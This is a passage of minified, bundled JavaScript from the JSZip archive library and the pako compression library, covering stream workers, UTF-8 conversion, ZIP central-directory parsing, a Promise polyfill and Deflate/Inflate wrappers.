F(E){this.name=E||"default",this.streamInfo={},this.generatedError=null,this.extraStreamInfo={},this.isPaused=!0,this.isFinished=!1,this.isLocked=!1,this._listeners={data:[],end:[],error:[]},this.previous=null}F.prototype={push:function(E){this.emit("data",E)},end:function(){if(this.isFinished)return!1;this.flush();try{this.emit("end"),this.cleanUp(),this.isFinished=!0}catch(E){this.emit("error",E)}return!0},error:function(E){return!this.isFinished&&(this.isPaused?this.generatedError=E:(this.isFinished=!0,this.emit("error",E),this.previous&&this.previous.error(E),this.cleanUp()),!0)},on:function(E,g){return this._listeners[E].push(g),this},cleanUp:function(){this.streamInfo=this.generatedError=this.extraStreamInfo=null,this._listeners=[]},emit:function(E,g){if(this._listeners[E])for(var b=0;b<this._listeners[E].length;b++)this._listeners[E][b].call(this,g)},pipe:function(E){return E.registerPrevious(this)},registerPrevious:function(E){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.streamInfo=E.streamInfo,this.mergeStreamInfo(),this.previous=E;var g=this;return E.on("data",function(b){g.processChunk(b)}),E.on("end",function(){g.end()}),E.on("error",function(b){g.error(b)}),this},pause:function(){return!this.isPaused&&!this.isFinished&&(this.isPaused=!0,this.previous&&this.previous.pause(),!0)},resume:function(){if(!this.isPaused||this.isFinished)return!1;this.isPaused=!1;var E=!1;return this.generatedError&&(this.error(this.generatedError),E=!0),this.previous&&this.previous.resume(),!E},flush:function(){},processChunk:function(E){this.push(E)},withStreamInfo:function(E,g){return this.extraStreamInfo[E]=g,this.mergeStreamInfo(),this},mergeStreamInfo:function(){for(var E in this.extraStreamInfo)Object.prototype.hasOwnProperty.call(this.extraStreamInfo,E)&&(this.streamInfo[E]=this.extraStreamInfo[E])},lock:function(){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.isLocked=!0,this.previous&&this.previous.lock()},toString:function(){var E="Worker "+this.name;return this.previous?this.previous+" -> "+E:E}},Q.exports=F},1285:(Q,F,E)=>{"use strict";var g=E(8910),b=E(4293),_=E(3718),y=E(8458),M=E(3790),p=E(8565),D=null;if(M.nodestream)try{D=E(1220)}catch(x){}function w(x,S,O){var U=S;switch(S){case"blob":case"arraybuffer":U="uint8array";break;case"base64":U="string"}try{this._internalType=U,this._outputType=S,this._mimeType=O,g.checkSupport(U),this._worker=x.pipe(new b(U)),x.lock()}catch(K){this._worker=new _("error"),this._worker.error(K)}}w.prototype={accumulate:function(x){return S=this,O=x,new p.Promise(function(U,K){var ee=[],se=S._internalType,ve=S._outputType,le=S._mimeType;S.on("data",function(ye,z){ee.push(ye),O&&O(z)}).on("error",function(ye){ee=[],K(ye)}).on("end",function(){try{var ye=function(z,l,f){switch(z){case"blob":return g.newBlob(g.transformTo("arraybuffer",l),f);case"base64":return y.encode(l);default:return g.transformTo(z,l)}}(ve,function(z,l){var f,A=0,v=null,P=0;for(f=0;f<l.length;f++)P+=l[f].length;switch(z){case"string":return l.join("");case"array":return Array.prototype.concat.apply([],l);case"uint8array":for(v=new Uint8Array(P),f=0;f<l.length;f++)v.set(l[f],A),A+=l[f].length;return v;case"nodebuffer":return ie.concat(l);default:throw new Error("concat : unsupported type '"+z+"'")}}(se,ee),le);U(ye)}catch(z){K(z)}ee=[]}).resume()});var S,O},on:function(x,S){var O=this;return this._worker.on(x,"data"===x?function(U){S.call(O,U.data,U.meta)}:function(){g.delay(S,arguments,O)}),this},resume:function(){return g.delay(this._worker.resume,[],this._worker),this},pause:function(){return this._worker.pause(),this},toNodejsStream:function(x){if(g.checkSupport("nodestream"),"nodebuffer"!==this._outputType)throw new Error(this._outputType+" is not supported by this method");return new D(this,{objectMode:"nodebuffer"!==this._outputType},x)}},Q.exports=w},3790:(Q,F,E)=>{"use strict";if(F.base64=!0,F.array=!0,F.string=!0,F.arraybuffer="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array,F.nodebuffer=void 0!==ie,F.uint8array="undefined"!=typeof Uint8Array,"undefined"==typeof ArrayBuffer)F.blob=!1;else{var g=new ArrayBuffer(0);try{F.blob=0===new Blob([g],{type:"application/zip"}).size}catch(_){try{var b=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);b.append(g),F.blob=0===b.getBlob("application/zip").size}catch(y){F.blob=!1}}}try{F.nodestream=!!E(749).Readable}catch(_){F.nodestream=!1}},3600:(Q,F,E)=>{"use strict";for(var g=E(8910),b=E(3790),_=E(2182),y=E(3718),M=new Array(256),p=0;p<256;p++)M[p]=p>=252?6:p>=248?5:p>=240?4:p>=224?3:p>=192?2:1;function D(){y.call(this,"utf-8 decode"),this.leftOver=null}function w(){y.call(this,"utf-8 encode")}M[254]=M[254]=1,F.utf8encode=function(x){return b.nodebuffer?_.newBufferFrom(x,"utf-8"):function(S){var O,U,K,ee,se,ve=S.length,le=0;for(ee=0;ee<ve;ee++)55296==(64512&(U=S.charCodeAt(ee)))&&ee+1<ve&&56320==(64512&(K=S.charCodeAt(ee+1)))&&(U=65536+(U-55296<<10)+(K-56320),ee++),le+=U<128?1:U<2048?2:U<65536?3:4;for(O=b.uint8array?new Uint8Array(le):new Array(le),se=0,ee=0;se<le;ee++)55296==(64512&(U=S.charCodeAt(ee)))&&ee+1<ve&&56320==(64512&(K=S.charCodeAt(ee+1)))&&(U=65536+(U-55296<<10)+(K-56320),ee++),U<128?O[se++]=U:U<2048?(O[se++]=192|U>>>6,O[se++]=128|63&U):U<65536?(O[se++]=224|U>>>12,O[se++]=128|U>>>6&63,O[se++]=128|63&U):(O[se++]=240|U>>>18,O[se++]=128|U>>>12&63,O[se++]=128|U>>>6&63,O[se++]=128|63&U);return O}(x)},F.utf8decode=function(x){return b.nodebuffer?g.transformTo("nodebuffer",x).toString("utf-8"):function(S){var O,U,K,ee,se=S.length,ve=new Array(2*se);for(U=0,O=0;O<se;)if((K=S[O++])<128)ve[U++]=K;else if((ee=M[K])>4)ve[U++]=65533,O+=ee-1;else{for(K&=2===ee?31:3===ee?15:7;ee>1&&O<se;)K=K<<6|63&S[O++],ee--;ee>1?ve[U++]=65533:K<65536?ve[U++]=K:(ve[U++]=55296|(K-=65536)>>10&1023,ve[U++]=56320|1023&K)}return ve.length!==U&&(ve.subarray?ve=ve.subarray(0,U):ve.length=U),g.applyFromCharCode(ve)}(x=g.transformTo(b.uint8array?"uint8array":"array",x))},g.inherits(D,y),D.prototype.processChunk=function(x){var S=g.transformTo(b.uint8array?"uint8array":"array",x.data);if(this.leftOver&&this.leftOver.length){if(b.uint8array){var O=S;(S=new Uint8Array(O.length+this.leftOver.length)).set(this.leftOver,0),S.set(O,this.leftOver.length)}else S=this.leftOver.concat(S);this.leftOver=null}var U=function(ee,se){var ve;for((se=se||ee.length)>ee.length&&(se=ee.length),ve=se-1;ve>=0&&128==(192&ee[ve]);)ve--;return ve<0||0===ve?se:ve+M[ee[ve]]>se?ve:se}(S),K=S;U!==S.length&&(b.uint8array?(K=S.subarray(0,U),this.leftOver=S.subarray(U,S.length)):(K=S.slice(0,U),this.leftOver=S.slice(U,S.length))),this.push({data:F.utf8decode(K),meta:x.meta})},D.prototype.flush=function(){this.leftOver&&this.leftOver.length&&(this.push({data:F.utf8decode(this.leftOver),meta:{}}),this.leftOver=null)},F.Utf8DecodeWorker=D,g.inherits(w,y),w.prototype.processChunk=function(x){this.push({data:F.utf8encode(x.data),meta:x.meta})},F.Utf8EncodeWorker=w},8910:(Q,F,E)=>{"use strict";var g=E(3790),b=E(8458),_=E(2182),y=E(8565);function M(O){return O}function p(O,U){for(var K=0;K<O.length;++K)U[K]=255&O.charCodeAt(K);return U}E(4889),F.newBlob=function(O,U){F.checkSupport("blob");try{return new Blob([O],{type:U})}catch(ee){try{var K=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);return K.append(O),K.getBlob(U)}catch(se){throw new Error("Bug : can't construct the Blob.")}}};var D={stringifyByChunk:function(O,U,K){var ee=[],se=0,ve=O.length;if(ve<=K)return String.fromCharCode.apply(null,O);for(;se<ve;)ee.push(String.fromCharCode.apply(null,"array"===U||"nodebuffer"===U?O.slice(se,Math.min(se+K,ve)):O.subarray(se,Math.min(se+K,ve)))),se+=K;return ee.join("")},stringifyByChar:function(O){for(var U="",K=0;K<O.length;K++)U+=String.fromCharCode(O[K]);return U},applyCanBeUsed:{uint8array:function(){try{return g.uint8array&&1===String.fromCharCode.apply(null,new Uint8Array(1)).length}catch(O){return!1}}(),nodebuffer:function(){try{return g.nodebuffer&&1===String.fromCharCode.apply(null,_.allocBuffer(1)).length}catch(O){return!1}}()}};function w(O){var U=65536,K=F.getTypeOf(O),ee=!0;if("uint8array"===K?ee=D.applyCanBeUsed.uint8array:"nodebuffer"===K&&(ee=D.applyCanBeUsed.nodebuffer),ee)for(;U>1;)try{return D.stringifyByChunk(O,K,U)}catch(se){U=Math.floor(U/2)}return D.stringifyByChar(O)}function x(O,U){for(var K=0;K<O.length;K++)U[K]=O[K];return U}F.applyFromCharCode=w;var S={};S.string={string:M,array:function(O){return p(O,new Array(O.length))},arraybuffer:function(O){return S.string.uint8array(O).buffer},uint8array:function(O){return p(O,new Uint8Array(O.length))},nodebuffer:function(O){return p(O,_.allocBuffer(O.length))}},S.array={string:w,array:M,arraybuffer:function(O){return new Uint8Array(O).buffer},uint8array:function(O){return new Uint8Array(O)},nodebuffer:function(O){return _.newBufferFrom(O)}},S.arraybuffer={string:function(O){return w(new Uint8Array(O))},array:function(O){return x(new Uint8Array(O),new Array(O.byteLength))},arraybuffer:M,uint8array:function(O){return new Uint8Array(O)},nodebuffer:function(O){return _.newBufferFrom(new Uint8Array(O))}},S.uint8array={string:w,array:function(O){return x(O,new Array(O.length))},arraybuffer:function(O){return O.buffer},uint8array:M,nodebuffer:function(O){return _.newBufferFrom(O)}},S.nodebuffer={string:w,array:function(O){return x(O,new Array(O.length))},arraybuffer:function(O){return S.nodebuffer.uint8array(O).buffer},uint8array:function(O){return x(O,new Uint8Array(O.length))},nodebuffer:M},F.transformTo=function(O,U){if(U||(U=""),!O)return U;F.checkSupport(O);var K=F.getTypeOf(U);return S[K][O](U)},F.resolve=function(O){for(var U=O.split("/"),K=[],ee=0;ee<U.length;ee++){var se=U[ee];"."===se||""===se&&0!==ee&&ee!==U.length-1||(".."===se?K.pop():K.push(se))}return K.join("/")},F.getTypeOf=function(O){return"string"==typeof O?"string":"[object Array]"===Object.prototype.toString.call(O)?"array":g.nodebuffer&&_.isBuffer(O)?"nodebuffer":g.uint8array&&O instanceof Uint8Array?"uint8array":g.arraybuffer&&O instanceof ArrayBuffer?"arraybuffer":void 0},F.checkSupport=function(O){if(!g[O.toLowerCase()])throw new Error(O+" is not supported by this platform")},F.MAX_VALUE_16BITS=65535,F.MAX_VALUE_32BITS=-1,F.pretty=function(O){var U,K,ee="";for(K=0;K<(O||"").length;K++)ee+="\\x"+((U=O.charCodeAt(K))<16?"0":"")+U.toString(16).toUpperCase();return ee},F.delay=function(O,U,K){setImmediate(function(){O.apply(K||null,U||[])})},F.inherits=function(O,U){var K=function(){};K.prototype=U.prototype,O.prototype=new K},F.extend=function(){var O,U,K={};for(O=0;O<arguments.length;O++)for(U in arguments[O])Object.prototype.hasOwnProperty.call(arguments[O],U)&&void 0===K[U]&&(K[U]=arguments[O][U]);return K},F.prepareContent=function(O,U,K,ee,se){return y.Promise.resolve(U).then(function(ve){return g.blob&&(ve instanceof Blob||-1!==["[object File]","[object Blob]"].indexOf(Object.prototype.toString.call(ve)))&&"undefined"!=typeof FileReader?new y.Promise(function(le,ye){var z=new FileReader;z.onload=function(l){le(l.target.result)},z.onerror=function(l){ye(l.target.error)},z.readAsArrayBuffer(ve)}):ve}).then(function(ve){var le,ye=F.getTypeOf(ve);return ye?("arraybuffer"===ye?ve=F.transformTo("uint8array",ve):"string"===ye&&(se?ve=b.decode(ve):K&&!0!==ee&&(ve=p(le=ve,g.uint8array?new Uint8Array(le.length):new Array(le.length)))),ve):y.Promise.reject(new Error("Can't read the data of '"+O+"'. Is it in a supported JavaScript type (String, Blob, ArrayBuffer, etc) ?"))})}},6624:(Q,F,E)=>{"use strict";var g=E(8435),b=E(8910),_=E(1141),y=E(9392),M=E(3790);function p(D){this.files=[],this.loadOptions=D}p.prototype={checkSignature:function(D){if(!this.reader.readAndCheckSignature(D)){this.reader.index-=4;var w=this.reader.readString(4);throw new Error("Corrupted zip or bug: unexpected signature ("+b.pretty(w)+", expected "+b.pretty(D)+")")}},isSignature:function(D,w){var x=this.reader.index;this.reader.setIndex(D);var S=this.reader.readString(4)===w;return this.reader.setIndex(x),S},readBlockEndOfCentral:function(){this.diskNumber=this.reader.readInt(2),this.diskWithCentralDirStart=this.reader.readInt(2),this.centralDirRecordsOnThisDisk=this.reader.readInt(2),this.centralDirRecords=this.reader.readInt(2),this.centralDirSize=this.reader.readInt(4),this.centralDirOffset=this.reader.readInt(4),this.zipCommentLength=this.reader.readInt(2);var D=this.reader.readData(this.zipCommentLength),x=b.transformTo(M.uint8array?"uint8array":"array",D);this.zipComment=this.loadOptions.decodeFileName(x)},readBlockZip64EndOfCentral:function(){this.zip64EndOfCentralSize=this.reader.readInt(8),this.reader.skip(4),this.diskNumber=this.reader.readInt(4),this.diskWithCentralDirStart=this.reader.readInt(4),this.centralDirRecordsOnThisDisk=this.reader.readInt(8),this.centralDirRecords=this.reader.readInt(8),this.centralDirSize=this.reader.readInt(8),this.centralDirOffset=this.reader.readInt(8),this.zip64ExtensibleData={};for(var D,w,x,S=this.zip64EndOfCentralSize-44;0<S;)D=this.reader.readInt(2),w=this.reader.readInt(4),x=this.reader.readData(w),this.zip64ExtensibleData[D]={id:D,length:w,value:x}},readBlockZip64EndOfCentralLocator:function(){if(this.diskWithZip64CentralDirStart=this.reader.readInt(4),this.relativeOffsetEndOfZip64CentralDir=this.reader.readInt(8),this.disksCount=this.reader.readInt(4),this.disksCount>1)throw new Error("Multi-volumes zip are not supported")},readLocalFiles:function(){var D,w;for(D=0;D<this.files.length;D++)this.reader.setIndex((w=this.files[D]).localHeaderOffset),this.checkSignature(_.LOCAL_FILE_HEADER),w.readLocalPart(this.reader),w.handleUTF8(),w.processAttributes()},readCentralDir:function(){var D;for(this.reader.setIndex(this.centralDirOffset);this.reader.readAndCheckSignature(_.CENTRAL_FILE_HEADER);)(D=new y({zip64:this.zip64},this.loadOptions)).readCentralPart(this.reader),this.files.push(D);if(this.centralDirRecords!==this.files.length&&0!==this.centralDirRecords&&0===this.files.length)throw new Error("Corrupted zip or bug: expected "+this.centralDirRecords+" records in central dir, got "+this.files.length)},readEndOfCentral:function(){var D=this.reader.lastIndexOfSignature(_.CENTRAL_DIRECTORY_END);if(D<0)throw this.isSignature(0,_.LOCAL_FILE_HEADER)?new Error("Corrupted zip: can't find end of central directory"):new Error("Can't find end of central directory : is this a zip file ? If it is, see https://stuk.github.io/jszip/documentation/howto/read_zip.html");this.reader.setIndex(D);var w=D;if(this.checkSignature(_.CENTRAL_DIRECTORY_END),this.readBlockEndOfCentral(),this.diskNumber===b.MAX_VALUE_16BITS||this.diskWithCentralDirStart===b.MAX_VALUE_16BITS||this.centralDirRecordsOnThisDisk===b.MAX_VALUE_16BITS||this.centralDirRecords===b.MAX_VALUE_16BITS||this.centralDirSize===b.MAX_VALUE_32BITS||this.centralDirOffset===b.MAX_VALUE_32BITS){if(this.zip64=!0,(D=this.reader.lastIndexOfSignature(_.ZIP64_CENTRAL_DIRECTORY_LOCATOR))<0)throw new Error("Corrupted zip: can't find the ZIP64 end of central directory locator");if(this.reader.setIndex(D),this.checkSignature(_.ZIP64_CENTRAL_DIRECTORY_LOCATOR),this.readBlockZip64EndOfCentralLocator(),!this.isSignature(this.relativeOffsetEndOfZip64CentralDir,_.ZIP64_CENTRAL_DIRECTORY_END)&&(this.relativeOffsetEndOfZip64CentralDir=this.reader.lastIndexOfSignature(_.ZIP64_CENTRAL_DIRECTORY_END),this.relativeOffsetEndOfZip64CentralDir<0))throw new Error("Corrupted zip: can't find the ZIP64 end of central directory");this.reader.setIndex(this.relativeOffsetEndOfZip64CentralDir),this.checkSignature(_.ZIP64_CENTRAL_DIRECTORY_END),this.readBlockZip64EndOfCentral()}var x=this.centralDirOffset+this.centralDirSize;this.zip64&&(x+=20,x+=12+this.zip64EndOfCentralSize);var S=w-x;if(S>0)this.isSignature(w,_.CENTRAL_FILE_HEADER)||(this.reader.zero=S);else if(S<0)throw new Error("Corrupted zip: missing "+Math.abs(S)+" bytes.")},prepareReader:function(D){this.reader=g(D)},load:function(D){this.prepareReader(D),this.readEndOfCentral(),this.readCentralDir(),this.readLocalFiles()}},Q.exports=p},9392:(Q,F,E)=>{"use strict";var g=E(8435),b=E(8910),_=E(7326),y=E(6988),M=E(3600),p=E(1678),D=E(3790);function w(x,S){this.options=x,this.loadOptions=S}w.prototype={isEncrypted:function(){return 1==(1&this.bitFlag)},useUTF8:function(){return 2048==(2048&this.bitFlag)},readLocalPart:function(x){var S,O;if(x.skip(22),this.fileNameLength=x.readInt(2),O=x.readInt(2),this.fileName=x.readData(this.fileNameLength),x.skip(O),-1===this.compressedSize||-1===this.uncompressedSize)throw new Error("Bug or corrupted zip : didn't get enough information from the central directory (compressedSize === -1 || uncompressedSize === -1)");if(null===(S=function(U){for(var K in p)if(Object.prototype.hasOwnProperty.call(p,K)&&p[K].magic===U)return p[K];return null}(this.compressionMethod)))throw new Error("Corrupted zip : compression "+b.pretty(this.compressionMethod)+" unknown (inner file : "+b.transformTo("string",this.fileName)+")");this.decompressed=new _(this.compressedSize,this.uncompressedSize,this.crc32,S,x.readData(this.compressedSize))},readCentralPart:function(x){this.versionMadeBy=x.readInt(2),x.skip(2),this.bitFlag=x.readInt(2),this.compressionMethod=x.readString(2),this.date=x.readDate(),this.crc32=x.readInt(4),this.compressedSize=x.readInt(4),this.uncompressedSize=x.readInt(4);var S=x.readInt(2);if(this.extraFieldsLength=x.readInt(2),this.fileCommentLength=x.readInt(2),this.diskNumberStart=x.readInt(2),this.internalFileAttributes=x.readInt(2),this.externalFileAttributes=x.readInt(4),this.localHeaderOffset=x.readInt(4),this.isEncrypted())throw new Error("Encrypted zip are not supported");x.skip(S),this.readExtraFields(x),this.parseZIP64ExtraField(x),this.fileComment=x.readData(this.fileCommentLength)},processAttributes:function(){this.unixPermissions=null,this.dosPermissions=null;var x=this.versionMadeBy>>8;this.dir=!!(16&this.externalFileAttributes),0===x&&(this.dosPermissions=63&this.externalFileAttributes),3===x&&(this.unixPermissions=this.externalFileAttributes>>16&65535),this.dir||"/"!==this.fileNameStr.slice(-1)||(this.dir=!0)},parseZIP64ExtraField:function(){if(this.extraFields[1]){var x=g(this.extraFields[1].value);this.uncompressedSize===b.MAX_VALUE_32BITS&&(this.uncompressedSize=x.readInt(8)),this.compressedSize===b.MAX_VALUE_32BITS&&(this.compressedSize=x.readInt(8)),this.localHeaderOffset===b.MAX_VALUE_32BITS&&(this.localHeaderOffset=x.readInt(8)),this.diskNumberStart===b.MAX_VALUE_32BITS&&(this.diskNumberStart=x.readInt(4))}},readExtraFields:function(x){var S,O,U,K=x.index+this.extraFieldsLength;for(this.extraFields||(this.extraFields={});x.index+4<K;)S=x.readInt(2),O=x.readInt(2),U=x.readData(O),this.extraFields[S]={id:S,length:O,value:U};x.setIndex(K)},handleUTF8:function(){var x=D.uint8array?"uint8array":"array";if(this.useUTF8())this.fileNameStr=M.utf8decode(this.fileName),this.fileCommentStr=M.utf8decode(this.fileComment);else{var S=this.findExtraFieldUnicodePath();if(null!==S)this.fileNameStr=S;else{var O=b.transformTo(x,this.fileName);this.fileNameStr=this.loadOptions.decodeFileName(O)}var U=this.findExtraFieldUnicodeComment();if(null!==U)this.fileCommentStr=U;else{var K=b.transformTo(x,this.fileComment);this.fileCommentStr=this.loadOptions.decodeFileName(K)}}},findExtraFieldUnicodePath:function(){var x=this.extraFields[28789];if(x){var S=g(x.value);return 1!==S.readInt(1)||y(this.fileName)!==S.readInt(4)?null:M.utf8decode(S.readData(x.length-5))}return null},findExtraFieldUnicodeComment:function(){var x=this.extraFields[25461];if(x){var S=g(x.value);return 1!==S.readInt(1)||y(this.fileComment)!==S.readInt(4)?null:M.utf8decode(S.readData(x.length-5))}return null}},Q.exports=w},6859:(Q,F,E)=>{"use strict";var g=E(1285),b=E(5301),_=E(3600),y=E(7326),M=E(3718),p=function(S,O,U){this.name=S,this.dir=U.dir,this.date=U.date,this.comment=U.comment,this.unixPermissions=U.unixPermissions,this.dosPermissions=U.dosPermissions,this._data=O,this._dataBinary=U.binary,this.options={compression:U.compression,compressionOptions:U.compressionOptions}};p.prototype={internalStream:function(S){var O=null,U="string";try{if(!S)throw new Error("No output type specified.");var K="string"===(U=S.toLowerCase())||"text"===U;"binarystring"!==U&&"text"!==U||(U="string"),O=this._decompressWorker();var ee=!this._dataBinary;ee&&!K&&(O=O.pipe(new _.Utf8EncodeWorker)),!ee&&K&&(O=O.pipe(new _.Utf8DecodeWorker))}catch(se){(O=new M("error")).error(se)}return new g(O,U,"")},async:function(S,O){return this.internalStream(S).accumulate(O)},nodeStream:function(S,O){return this.internalStream(S||"nodebuffer").toNodejsStream(O)},_compressWorker:function(S,O){if(this._data instanceof y&&this._data.compression.magic===S.magic)return this._data.getCompressedWorker();var U=this._decompressWorker();return this._dataBinary||(U=U.pipe(new _.Utf8EncodeWorker)),y.createWorkerFrom(U,S,O)},_decompressWorker:function(){return this._data instanceof y?this._data.getContentWorker():this._data instanceof M?this._data:new b(this._data)}};for(var D=["asText","asBinary","asNodeBuffer","asUint8Array","asArrayBuffer"],w=function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},x=0;x<D.length;x++)p.prototype[D[x]]=w;Q.exports=p},3389:(Q,F,E)=>{"use strict";var g=E(5705);function b(){}var _={},y=["REJECTED"],M=["FULFILLED"],p=["PENDING"];function D(K){if("function"!=typeof K)throw new TypeError("resolver must be a function");this.state=p,this.queue=[],this.outcome=void 0,K!==b&&O(this,K)}function w(K,ee,se){this.promise=K,"function"==typeof ee&&(this.onFulfilled=ee,this.callFulfilled=this.otherCallFulfilled),"function"==typeof se&&(this.onRejected=se,this.callRejected=this.otherCallRejected)}function x(K,ee,se){g(function(){var ve;try{ve=ee(se)}catch(le){return _.reject(K,le)}ve===K?_.reject(K,new TypeError("Cannot resolve promise with itself")):_.resolve(K,ve)})}function S(K){var ee=K&&K.then;if(K&&("object"==typeof K||"function"==typeof K)&&"function"==typeof ee)return function(){ee.apply(K,arguments)}}function O(K,ee){var se=!1;function ve(z){se||(se=!0,_.reject(K,z))}function le(z){se||(se=!0,_.resolve(K,z))}var ye=U(function(){ee(le,ve)});"error"===ye.status&&ve(ye.value)}function U(K,ee){var se={};try{se.value=K(ee),se.status="success"}catch(ve){se.status="error",se.value=ve}return se}Q.exports=D,D.prototype.finally=function(K){if("function"!=typeof K)return this;var ee=this.constructor;return this.then(function(se){return ee.resolve(K()).then(function(){return se})},function(se){return ee.resolve(K()).then(function(){throw se})})},D.prototype.catch=function(K){return this.then(null,K)},D.prototype.then=function(K,ee){if("function"!=typeof K&&this.state===M||"function"!=typeof ee&&this.state===y)return this;var se=new this.constructor(b);return this.state!==p?x(se,this.state===M?K:ee,this.outcome):this.queue.push(new w(se,K,ee)),se},w.prototype.callFulfilled=function(K){_.resolve(this.promise,K)},w.prototype.otherCallFulfilled=function(K){x(this.promise,this.onFulfilled,K)},w.prototype.callRejected=function(K){_.reject(this.promise,K)},w.prototype.otherCallRejected=function(K){x(this.promise,this.onRejected,K)},_.resolve=function(K,ee){var se=U(S,ee);if("error"===se.status)return _.reject(K,se.value);var ve=se.value;if(ve)O(K,ve);else{K.state=M,K.outcome=ee;for(var le=-1,ye=K.queue.length;++le<ye;)K.queue[le].callFulfilled(ee)}return K},_.reject=function(K,ee){K.state=y,K.outcome=ee;for(var se=-1,ve=K.queue.length;++se<ve;)K.queue[se].callRejected(ee);return K},D.resolve=function(K){return K instanceof this?K:_.resolve(new this(b),K)},D.reject=function(K){var ee=new this(b);return _.reject(ee,K)},D.all=function(K){var ee=this;if("[object Array]"!==Object.prototype.toString.call(K))return this.reject(new TypeError("must be an array"));var se=K.length,ve=!1;if(!se)return this.resolve([]);for(var le=new Array(se),ye=0,z=-1,l=new this(b);++z<se;)f(K[z],z);return l;function f(A,v){ee.resolve(A).then(function(P){le[v]=P,++ye!==se||ve||(ve=!0,_.resolve(l,le))},function(P){ve||(ve=!0,_.reject(l,P))})}},D.race=function(K){if("[object Array]"!==Object.prototype.toString.call(K))return this.reject(new TypeError("must be an array"));var ee=K.length,se=!1;if(!ee)return this.resolve([]);for(var le=-1,ye=new this(b);++le<ee;)this.resolve(K[le]).then(function(z){se||(se=!0,_.resolve(ye,z))},function(z){se||(se=!0,_.reject(ye,z))});return ye}},9591:(Q,F,E)=>{"use strict";var g={};(0,E(4236).assign)(g,E(4555),E(8843),E(1619)),Q.exports=g},4555:(Q,F,E)=>{"use strict";var g=E(405),b=E(4236),_=E(9373),y=E(8898),M=E(2292),p=Object.prototype.toString;function D(x){if(!(this instanceof D))return new D(x);this.options=b.assign({level:-1,method:8,chunkSize:16384,windowBits:15,memLevel:8,strategy:0,to:""},x||{});var S=this.options;S.raw&&S.windowBits>0?S.windowBits=-S.windowBits:S.gzip&&S.windowBits>0&&S.windowBits<16&&(S.windowBits+=16),this.err=0,this.msg="",this.ended=!1,this.chunks=[],this.strm=new M,this.strm.avail_out=0;var O=g.deflateInit2(this.strm,S.level,S.method,S.windowBits,S.memLevel,S.strategy);if(0!==O)throw new Error(y[O]);if(S.header&&g.deflateSetHeader(this.strm,S.header),S.dictionary){var U;if(U="string"==typeof S.dictionary?_.string2buf(S.dictionary):"[object ArrayBuffer]"===p.call(S.dictionary)?new Uint8Array(S.dictionary):S.dictionary,0!==(O=g.deflateSetDictionary(this.strm,U)))throw new Error(y[O]);this._dict_set=!0}}function w(x,S){var O=new D(S);if(O.push(x,!0),O.err)throw O.msg||y[O.err];return O.result}D.prototype.push=function(x,S){var O,U,K=this.strm,ee=this.options.chunkSize;if(this.ended)return!1;U=S===~~S?S:!0===S?4:0,K.input="string"==typeof x?_.string2buf(x):"[object ArrayBuffer]"===p.call(x)?new Uint8Array(x):x,K.next_in=0,K.avail_in=K.input.length;do{if(0===K.avail_out&&(K.output=new b.Buf8(ee),K.next_out=0,K.avail_out=ee),1!==(O=g.deflate(K,U))&&0!==O)return this.onEnd(O),this.ended=!0,!1;0!==K.avail_out&&(0!==K.avail_in||4!==U&&2!==U)||this.onData("string"===this.options.to?_.buf2binstring(b.shrinkBuf(K.output,K.next_out)):b.shrinkBuf(K.output,K.next_out))}while((K.avail_in>0||0===K.avail_out)&&1!==O);return 4===U?(O=g.deflateEnd(this.strm),this.onEnd(O),this.ended=!0,0===O):2!==U||(this.onEnd(0),K.avail_out=0,!0)},D.prototype.onData=function(x){this.chunks.push(x)},D.prototype.onEnd=function(x){0===x&&(this.result="string"===this.options.to?this.chunks.join(""):b.flattenChunks(this.chunks)),this.chunks=[],this.err=x,this.msg=this.strm.msg},F.Deflate=D,F.deflate=w,F.deflateRaw=function(x,S){return(S=S||{}).raw=!0,w(x,S)},F.gzip=function(x,S){return(S=S||{}).gzip=!0,w(x,S)}},8843:(Q,F,E)=>{"use strict";var g=E(7948),b=E(4236),_=E(9373),y=E(1619),M=E(8898),p=E(2292),D=E(2401),w=Object.prototype.toString;function x(O){if(!(this instanceof x))return new x(O);this.options=b.assign({chunkSize:16384,windowBits:0,to:""},O||{});var U=this.options;U.raw&&U.windowBits>=0&&U.windowBits<16&&(U.windowBits=-U.windowBits,0===U.windowBits&&(U.windowBits=-15)),!(U.windowBits>=0&&U.windowBits<16)||O&&O.windowBits||(U.windowBits+=32),U.windowBits>15&&U.windowBits<48&&0==(15&U.windowBits)&&(U.windowBits|=15),this.err=0,this.msg="",this.ended=!1,this.chunks=[],this.strm=new p,this.strm.avail_out=0;var K=g.inflateInit2(this.strm,U.windowBits);if(K!==y.Z_OK)throw new Error(M[K]);if(this.header=new D,g.inflateGetHeader(this.strm,this.header),U.dictionary&&("string"==typeof U.dictionary?U.dictionary=_.string2buf(U.dictionary):"[object ArrayBuffer]"===w.call(U.dictionary)&&(U.dictionary=new Uint8Array(U.dictionary)),U.raw&&(K=g.inflateSetDictionary(this.strm,U.dictionary))!==y.Z_OK))throw new Error(M[K])}function S(O,U){var K=new x(U);if(K.push(O,!0),K.err)throw K.msg||M[K.err];return K.result}x.prototype.push=function(O,U){var K,ee,se,ve,le,ye=this.strm,z=this.options.chunkSize,l=this.options.dictionary,f=!1;if(this.ended)return!1;ee=U===~~U?U:!0===U?y.Z_FINISH:y.Z_NO_FLUSH,ye.input="string"==typeof O?_.binstring2buf(O):"[object ArrayBuffer]"===w.call(O)?new Uint8Array(O):O,ye.next_in=0,ye.avail_in=ye.input.length;do{if(0===ye.avail_out&&(ye.output=new b.Buf8(z),ye.next_out=0,ye.avail_out=z),(K=g.inflate(ye,y.Z_NO_FLUSH))===y.Z_NEED_DICT&&l&&(K=g.inflateSetDictionary(this.strm,l)),K===y.Z_BUF_ERROR&&!0===f&&(K=y.Z_OK,f=!1),K!==y.Z_STREAM_END&&K!==y.Z_OK)return 